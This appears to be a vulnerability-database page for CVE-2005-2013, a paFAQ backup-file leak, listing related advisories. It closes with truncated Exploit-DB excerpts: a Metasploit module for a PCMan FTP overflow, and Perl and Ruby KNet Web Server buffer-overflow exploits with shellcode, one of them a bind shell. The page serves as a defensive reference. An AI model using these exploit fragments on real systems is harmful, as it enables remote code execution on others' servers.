CVE-2005-2013
published 2005-06-20CVE-2005-2013: paFAQ 1.0 Beta 4 allows remote attackers to obtain sensitive information via a direct request to admin/backup.php, which contains a backup of the database…
PriorityP416medium5CVSS 2.0
AVNACLAuNCPINAN
EPSS
1.34%
67.8th percentile
paFAQ 1.0 Beta 4 allows remote attackers to obtain sensitive information via a direct request to admin/backup.php, which contains a backup of the database including usernames and passwords.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_arena | pafaq | — | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
ghsa4.3MEDIUM
vendor_redhat6.8MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Apache Tomcat is vulnerable to HTTP request-smuggling
ghsa·2022-05-14·CVSS 4.3
CVE-2013-4286 [MEDIUM] CWE-20 Apache Tomcat is vulnerable to HTTP request-smuggling
Apache Tomcat is vulnerable to HTTP request-smuggling
Apache Tomcat before 6.0.39, 7.x before 7.0.47, and 8.x before 8.0.0-RC3, when an HTTP connector or AJP connector is used, does not properly handle certain inconsistent HTTP request headers, which allows remote attackers to trigger incorrect identification of a request's length and conduct request-smuggling attacks via (1) multiple Content-Length headers or (2) a Content-Length header and a "Transfer-Encoding: chunked" header. NOTE: this vulnerability exists because of an incomplete fix for CVE-2005-2090.
GHSA
GHSA-q768-g46g-x66p: paFAQ 1
ghsa_unreviewed·2022-05-01
CVE-2005-2013 [MEDIUM] GHSA-q768-g46g-x66p: paFAQ 1
paFAQ 1.0 Beta 4 allows remote attackers to obtain sensitive information via a direct request to admin/backup.php, which contains a backup of the database including usernames and passwords.
Red Hat
tomcat: multiple content-length header poisoning flaws
vendor_redhat·2014-02-25·CVSS 4.3
CVE-2013-4286 [MEDIUM] tomcat: multiple content-length header poisoning flaws
tomcat: multiple content-length header poisoning flaws
Apache Tomcat before 6.0.39, 7.x before 7.0.47, and 8.x before 8.0.0-RC3, when an HTTP connector or AJP connector is used, does not properly handle certain inconsistent HTTP request headers, which allows remote attackers to trigger incorrect identification of a request's length and conduct request-smuggling attacks via (1) multiple Content-Length headers or (2) a Content-Length header and a "Transfer-Encoding: chunked" header. NOTE: this vulnerability exists because of an incomplete fix for CVE-2005-2090.
It was found that when Tomcat / JBoss Web processed a series of HTTP requests in which at least one request contained either multiple content-length headers, or one content-length header with a chunked transfer-encoding header, Tomc
Red Hat
libXt: Memory corruption due to unchecked use of unchecked function pointers
vendor_redhat·2013-05-23·CVSS 6.8
CVE-2013-2005 [MEDIUM] CWE-392 libXt: Memory corruption due to unchecked use of unchecked function pointers
libXt: Memory corruption due to unchecked use of unchecked function pointers
X.org libXt 1.1.3 and earlier does not check the return value of the XGetWindowProperty function, which allows X servers to trigger use of an uninitialized pointer and memory corruption via vectors related to the (1) ReqCleanup, (2) HandleSelectionEvents, (3) ReqTimedOut, (4) HandleNormal, and (5) HandleSelectionReplies functions.
A flaw was found in the way the X.Org X11 libXt runtime library used uninitialized pointers. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
Statement: This issue affects the libXt package in Red Hat Enterprise Linux 5. Red Hat Product Security has rated this issue as having Moderate security impact.
No detection rules found.
Exploit-DB
PCMan FTP Server 2.0.7 - Remote (Metasploit)
exploitdb·2013-07-22
CVE-2013-4730 PCMan FTP Server 2.0.7 - Remote (Metasploit)
PCMan FTP Server 2.0.7 - Remote (Metasploit)
---
# Exploit-DB Note: Ret needs adjustment for Windows XP SP3 English
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'PCMan\'s FTPD V2.0.7 Username Overflow',
'Description' => %q{
This module exploits a buffer overflow found in the USER command
of PCMan's FTPD.
},
'Author' => 'MSJ ',
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 2005,
'BadChars' => "\x53\x93\x42\x7E",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Target 0
[
'Windows XP SP3 En
Exploit-DB
KNet Web Server 1.04b - Stack Corruption Buffer Overflow
exploitdb·2013-04-12
CVE-2005-0575 KNet Web Server 1.04b - Stack Corruption Buffer Overflow
KNet Web Server 1.04b - Stack Corruption Buffer Overflow
---
#!/usr/bin/perl
# KNet Web Server Stack corruption BoF PoC
# Written by Wireghoul - http://www.justanotherhacker.com
# Date: 2013/04/11
# Version: 1.04b
# Tested on: WinXP SP3
use IO::Socket::INET;
$host = shift;
$port = shift;
print "KNet Web Server stack corruption BoF PoC - Wireghoul -
http://www.justanotherhacker.com\n";
die "Usage $0 \n" unless $host && $port;
$sock = IO::Socket::INET->new("$host:$port") or die "Unable to connect to
$host:$port\n";
# Shellcode for calc.exe
$shellcode=
"\x89\xe2\xda\xd5\xd9\x72\xf4\x5d\x55\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41
Exploit-DB
KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
exploitdb·2013-03-29
CVE-2005-0575 KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
---
#!/usr/bin/ruby
# Exploit Title: KNet Web Server Buffer Overflow SEH
# Date: 2013-03-27
# Exploit Author: Myo Soe, http://yehg.net/
# Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html
# Version: KNet 1.04b
# Tested on: Windows 7
require 'net/http'
require 'uri'
require 'socket'
############################################
# bind port 4444
sc_bind =
"\xbd\x0e\x27\x05\xab\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x56\x83\xc2\x04\x31\x6a\x0f\x03\x6a\x01\xc5\xf0\x57" +
"\xf5\x80\xfb\xa7\x05\xf3\x72\x42\x34\x21\xe0\x06\x64\xf5" +
"\x62\x4a\x84\x7e\x26\x7f\x1f\xf2\xef\x70\xa8\xb9\xc9\xbf" +
"\x29\x0c\xd6\x6c\xe9\x0e\xaa\x6e\x3d\xf1\x93\xa0\x30\xf0" +
"\xd4\xdd\xba\xa0\x8d\xaa\x68\x55\xb9\xef\xb0\x54\x6d\
2005-06-20
Published